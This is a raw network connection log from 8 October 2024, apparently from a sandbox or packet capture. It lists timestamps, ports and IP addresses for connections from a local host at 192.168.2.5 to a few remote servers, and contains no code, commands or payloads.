Oct 8, 2024 20:47:17.801038027 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.801352978 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.801371098 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.801676035 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.801687956 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.833817005 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.834255934 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.834314108 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.834640026 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.834652901 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.878289938 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.878345966 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.878429890 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.879128933 CEST	49740	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.879157066 CEST	443	49740	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.882505894 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.882549047 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.882770061 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.883030891 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.883043051 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.895180941 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.895334959 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.895550966 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.896265984 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.896265984 CEST	49741	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.896301985 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.896321058 CEST	443	49741	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.899935961 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.899971008 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.900130033 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.900378942 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.900403023 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.901738882 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.901889086 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.901942968 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.905174017 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.905210018 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.905232906 CEST	49742	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.905241966 CEST	443	49742	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.910948992 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.911032915 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.911245108 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.911441088 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.911468029 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.936522007 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.936602116 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.936712980 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.937227964 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.937252998 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.937267065 CEST	49743	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.937274933 CEST	443	49743	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.943728924 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.943778038 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.943840027 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.944521904 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:17.944534063 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:17.961985111 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:17.962042093 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:17.962121964 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:17.964443922 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:17.964476109 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.027525902 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.028172970 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.028218031 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.028584957 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.028599024 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.134290934 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.134443998 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.134612083 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.134673119 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.134673119 CEST	49744	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.134710073 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.134732962 CEST	443	49744	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.137003899 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.137094975 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.137193918 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.137391090 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.137428999 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.567286015 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.568120003 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.568135023 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.568286896 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.568304062 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.583190918 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.583662033 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.583672047 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.584016085 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.584032059 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.618998051 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.619091988 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.620630980 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.620942116 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.620985985 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.621296883 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.621314049 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.645709991 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.646143913 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.646176100 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.646497965 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.646508932 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.660531998 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.660557985 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.661422014 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.661504984 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.672396898 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.674956083 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.675033092 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.675416946 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.675478935 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.675503969 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.675560951 CEST	49745	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.675566912 CEST	443	49745	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.678430080 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.678488016 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.678705931 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.678824902 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.678838968 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.684325933 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.684452057 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.684544086 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.684617996 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.684617996 CEST	49746	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.684632063 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.684638977 CEST	443	49746	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.686772108 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.686866999 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.686949968 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.687089920 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.687125921 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.719461918 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.727322102 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.727382898 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.727472067 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.727564096 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.727565050 CEST	49747	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.727606058 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.727631092 CEST	443	49747	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.729604959 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.729691029 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.729780912 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.729892969 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.729923964 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.753509998 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.753567934 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.753628016 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.753757954 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.753782988 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.753798962 CEST	49748	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.753806114 CEST	443	49748	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.755893946 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.755976915 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.756419897 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.756520033 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.756541967 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.817307949 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.817956924 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.817996979 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.818377018 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.818388939 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.867330074 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.867372036 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.867440939 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.867475986 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.867475986 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.867541075 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.867574930 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.867583990 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.867610931 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.867631912 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.869646072 CEST	49749	443	192.168.2.5	149.154.167.99
Oct 8, 2024 20:47:18.869680882 CEST	443	49749	149.154.167.99	192.168.2.5
Oct 8, 2024 20:47:18.887319088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:18.892180920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:18.892255068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:18.892370939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:18.897238016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:18.950073957 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.950253963 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.950800896 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.950872898 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.950897932 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.950911999 CEST	49750	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.950918913 CEST	443	49750	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.953737974 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.953783035 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:18.953896999 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.954035044 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:18.954049110 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.319139957 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.319674969 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.319722891 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.320082903 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.320096016 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.395236969 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.395756006 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.395817041 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.396172047 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.396184921 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.400075912 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.400409937 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.400444984 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.400702953 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.400712967 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420093060 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420607090 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.420667887 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420836926 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420844078 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.420859098 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420883894 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.420938969 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.421114922 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.421114922 CEST	49751	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.421153069 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.421179056 CEST	443	49751	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.423604965 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.423696041 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.423785925 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.423904896 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.423924923 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.494157076 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.494218111 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.494431019 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.494474888 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.494474888 CEST	49753	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.494498968 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.494513988 CEST	443	49753	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.497638941 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.497728109 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.497817039 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.497956991 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.497977018 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.504388094 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.504554033 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.504637003 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.504750013 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.504774094 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.504789114 CEST	49752	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.504796028 CEST	443	49752	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.506705999 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.506741047 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.506911039 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.507031918 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.507042885 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.524111032 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.524168015 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.524302006 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.524302006 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.524379969 CEST	49754	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.524416924 CEST	443	49754	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.526073933 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.526104927 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.526191950 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.526288986 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.526300907 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.633099079 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.633872986 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.633909941 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.634310961 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.634324074 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.739140034 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.739207029 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.739265919 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.739411116 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.739432096 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.739444017 CEST	49756	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.739449024 CEST	443	49756	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.742230892 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.742321014 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.742419004 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.742616892 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:19.742650032 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:19.916579008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:19.916646004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:19.920522928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:19.925416946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:20.097455978 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.097994089 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.098025084 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.098462105 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.098473072 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.153254032 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.153702974 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.153729916 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.154149055 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.154165030 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.162844896 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.163062096 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.164575100 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.164598942 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.165184021 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.165201902 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.165621996 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.165652037 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.166074038 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.166080952 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.268253088 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.268296003 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.268356085 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.268579960 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.268599033 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.268625975 CEST	49757	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.268634081 CEST	443	49757	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.271892071 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.271917105 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.272008896 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.272120953 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.272145033 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399396896 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399491072 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399559021 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.399729013 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399847984 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.399873018 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399888992 CEST	49760	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.399893999 CEST	443	49760	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399898052 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.399959087 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.400170088 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.400177002 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.400187969 CEST	49759	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.400191069 CEST	443	49759	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.401856899 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.401957989 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.402019024 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.403050900 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.403086901 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.403217077 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.404805899 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.404887915 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.404968977 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.405100107 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.405123949 CEST	443	49758	13.107.246.60	192.168.2.5
